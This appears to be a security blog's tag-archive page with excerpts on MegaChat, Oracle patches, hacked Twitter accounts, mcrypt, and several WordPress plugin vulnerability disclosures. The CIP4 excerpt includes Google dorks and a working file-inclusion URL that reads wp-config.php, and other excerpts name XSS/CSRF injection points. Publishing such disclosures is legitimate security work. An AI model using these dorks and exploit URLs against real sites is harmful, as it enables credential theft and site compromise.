Tag archives: sicurezza (security)

 


MegaChat, a viable alternative to Hangout and Skype

Kim Dotcom has announced the release of MegaChat, a new web service for encrypted VoIP calls that aims to offer a viable alternative to Google Hangout and Skype.

Almost at the same time as the arrival of WhatsApp Web (for more information), another important web service has arrived: MegaChat.
MegaChat is a web service that lets us make free voice and video calls inside the browser, without third-party plugins or dedicated clients. One of MegaChat's main features is security: the service encrypts calls using a protocol called User Controlled Encryption (UCE), and it also lets users exchange files securely (since these are encrypted as well).


Oracle releases 167 critical security fixes for Java and Sun systems

Oracle has released a critical patch update fixing 167 vulnerabilities across hundreds of its products, warning that the worst of them could be remotely exploited by hackers. The pressing fixes involve several of Oracle’s most widely used products and scored a full 10.0 rating on the CVSS 2.0 Base Score for vulnerabilities, the highest score [...]

 


New York Post and UPI Twitter accounts hacked

The Twitter accounts of the New York Post and United Press International (UPI) have been hacked with fake tweets on economic and military news. In one post, the Pope was quoted on UPI’s Twitter feed as saying that “World War III has begun”. Meanwhile, the New York Post’s account said that hostilities had broken out [...]

 


WordPress CIP4 Folder Download 1.10 Local File Inclusion

# Exploit Title: CIP4 Folder Download Widget LFI
# Google Dork: index of :/cip4-folder-download-widget
# Date: 13-01-2015
# Exploit Author: Ben khlifa Fahmi (XTnR3v0lt)
# Vendor Homepage: http://community.cip4.org
# Software Link: https://wordpress.org/plugins/cip4-folder-download-widget/
# Version: 1.10
# Tested on: Ubuntu 14.04

Dork : inurl:/wp-content/plugins/cip4-folder-download-widget/

Exploit : http://localhost/[wordpress]/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php

Ben khlifa Fahmi – Founder & [...]

 


mcrypt, a tool to quickly encrypt and decrypt a file

We present mcrypt, a simple open-source tool that lets us encrypt or decrypt a file from the command line.

mcrypt in Ubuntu
Over the years we have presented numerous programs and tools for keeping our files safe from prying eyes. Among the many solutions available in the official repositories of the main Linux distributions is mcrypt, an open-source command-line tool with some very interesting features.
mcrypt lets us quickly encrypt and decrypt a file directly from the command line, with a choice of many different algorithms and a range of useful options.


WordPress Slideoptinprox Cross Site Scripting

[*] Exploit Title: Wordpress slideoptinprox Plugin Cross site scripting vulnerability
[*] Google Dork: inurl:"/wp-content/plugins/slideoptinprox/"
[*] Date: 2015-01-08
[*] Exploit Author: Ashiyane Digital Security Team
[*] Vendor Homepage: https://pluginu.com/slideoptinprox/
[*] Tested on: Windows 8.1, Kali Linux

[*] Location: [localhost]/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=[XSS]

[*] Proof: [...]

 


WordPress Simple Security Plugin XSS vulnerabilities

Advisory ID: HTB23244
Product: Simple Security WordPress Plugin
Vendor: MyWebsiteAdvisor
Vulnerable Version(s): 1.1.5 and probably prior
Tested Version: 1.1.5
Advisory Publication: December 17, 2014 [without technical details]
Vendor Notification: December 17, 2014
Public Disclosure: January 14, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9570
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: [...]

 


WordPress WP Unique Article Header Image 1.0 CSRF / XSS

# Title: CSRF / Stored XSS Vulnerability in WP Unique Article Header Image Wordpress Plugin
# Author: Manideep K
# cve-id : CVE-2014-9400
# Plugin Homepage: https://wordpress.org/plugins/wp-unique-article-header-image/
# Version Affected: 1.0 (probably lower versions)
# Severity: High

# Description:
Vulnerable Parameter: gt_default_header and gt_homepage_header
# Vulnerability Class: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

[...]

 


WordPress WP Limit Posts Automatically 0.7 CSRF / XSS

# Title: CSRF / Stored XSS Vulnerability in WP Limit Posts Automatically Wordpress Plugin
# Author: Manideep K
# cve-id: CVE-2014-9401
# Plugin Homepage: https://wordpress.org/plugins/wp-limit-posts-automatically/
# Version Affected: 0.7 (probably lower versions)
# Severity: High

# Description:
# Vulnerable Parameter: all text fields to name – lpa_post_letters
# About Vulnerability: This plugin is vulnerable [...]

 


WordPress TweetScribe 1.1 CSRF / XSS

# Title: CSRF / Stored XSS Vulnerability in TweetScribe Wordpress Plugin
# Author: Manideep K
# CVE-ID: CVE-2014-9399
# Plugin Homepage: https://wordpress.org/plugins/tweetscribe/
# Version Affected: 1.1 (probably lower versions)
# Severity: High

# Description:
Vulnerable Parameter: tweetscribe_username
Vulnerability Class: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

# About Vulnerability: This plugin is vulnerable to [...]